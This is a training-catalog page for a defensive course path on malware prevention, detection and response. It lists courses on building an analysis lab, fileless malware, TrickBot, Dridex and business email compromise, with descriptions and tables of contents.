Malware: Prevention, Detection, and Response

Paths

Malware: Prevention, Detection, and Response

Authors: Tyler Hudak, Aaron Rosenmund, Josh Stroschein

In this container of content, you will learn how to analyze several specific types of malware for the purpose of identifying indicators used for host and network detection. To... Read more

What you will learn

  • Host detection and analysis of indicators
  • Network detection and analysis of indicators
  • Defensive techniques to combat the specific malware type

Pre-requisites

  • Security fundamentals
  • Malware Analysis skill path

Malware: Prevention, Detection, and Response

In this container of content, you will learn how to analyze, several specific types of malware, for the purpose of identifying indicators that can be used for host and network detection.

Setting Up a Malware Analysis Lab

by Tyler Hudak

Nov 21, 2019 / 1h 25m

1h 25m

Start Course
Description

In this course, Setting Up a Malware Analysis Lab, Aaron Rosenmund and Tyler Hudak discuss why you need to have your own malware analysis lab. There are variety of roles outside of reverse engineering that performs dynamic analysis of malware samples. Having the skills to identify the indicators of compromise make you invaluable to incident response and security operations teams. You will learn not only how to build a virtual machine, but also how to modify the operating system to properly trick the malware into believing it is in a safe place to detonate, what tools to use, and how to run them in your own malware analysis lab.

Table of contents
  1. Course Overview
  2. Malware Analysis for Security Operations
  3. Creating a Sacrificial VM
  4. Passing Off Your Virtual Machine as the Real Deal
  5. Choosing Your Load Out
  6. Summary and Recap

Fileless Malware

by Tyler Hudak

Dec 18, 2018 / 1h 40m

1h 40m

Start Course
Description

In this course, Hunting for Fileless Malware, Tyler Hudak and Aaron Rosenmund tackle what exactly fileless malware is, why it is used by attackers, and the different defensive strategies that can be taken to defend your organizations from it. Learn about different examples of fileless malware techniques, the use of native tools (PowerShell and WMI), and the types of defenses you can use. By the end of this course, you’ll have a solid understanding of the various types of fileless malware and how best to defend against it.

Table of contents
  1. Course Overview
  2. What Is Fileless Malware?
  3. How Does Fileless Malware Work?
  4. Why Do Attackers Use These Techniques?
  5. Defenses Against Fileless Malware: Employing Proper Logging
  6. Defenses Against Fileless Malware: Utilizing Hunting Tools
  7. Conclusion

Trickbot Banking Trojan

by Tyler Hudak

Nov 15, 2019 / 1h 29m

1h 29m

Start Course
Description

In this course, Malware Analysis and Detection: TrickBot, Aaron Rosenmund and Tyler Hudak discuss the malware TrickBot, a popular malware used by attackers. By the end of this course, you will learn how TrickBot works, what it does to computers it compromises, and what tools you can use to detect it on your hosts and network.

Table of contents
  1. Course Overview
  2. Introducing Trickbot
  3. Dynamic Analysis in the Lab
  4. Obtaining TrickBot Configuration and Files
  5. Detecting TrickBot Indicators on Your Network
  6. Summary and Recap

Business Email Compromise

by Aaron Rosenmund

Dec 9, 2020 / 1h 54m

1h 54m

Start Course
Description

Though not technically malware in the sense of a malicious executable running on your systems, business email compromise is just as dangerous. Leveraging the cloud based email solutions that we have come to rely on, this family of cyber attacks has become more advanced and is responsible for billions of dollars in losses. In this course, Business Email Compromise, you’ll learn how these attacks work, who they target, and various techniques attackers use to leverage email compromise access to steal money and impersonate their victims. By the end of this course, you will learn effective and practical actions you can take to prevent, detect, and if required, respond to a business email compromise attack.

Table of contents
  1. Course Overview
  2. Business Email Compromises: Prevention, Detection, and Response

Dridex Banking Trojan

by Josh Stroschein

May 11, 2021 / 1h 57m

1h 57m

Start Course
Description

Cybersecurity is extremely crucial when it comes to staying ahead of the newest threats. In this course, Dridex Banking Trojan, you’ll learn all about the banking Trojan Dridex. First, you’ll explore how Dridex is delivered through phishing campaigns and social engineering and ways to prevent initial infections. Next, you’ll learn ways to detect Dridex on your networks. Finally, you’ll learn how to respond when you have discovered an active infection. When you’re finished with this course, you’ll have the skills and knowledge of Dridex needed to disrupt

Table of contents
  1. Course Overview
  2. Dridex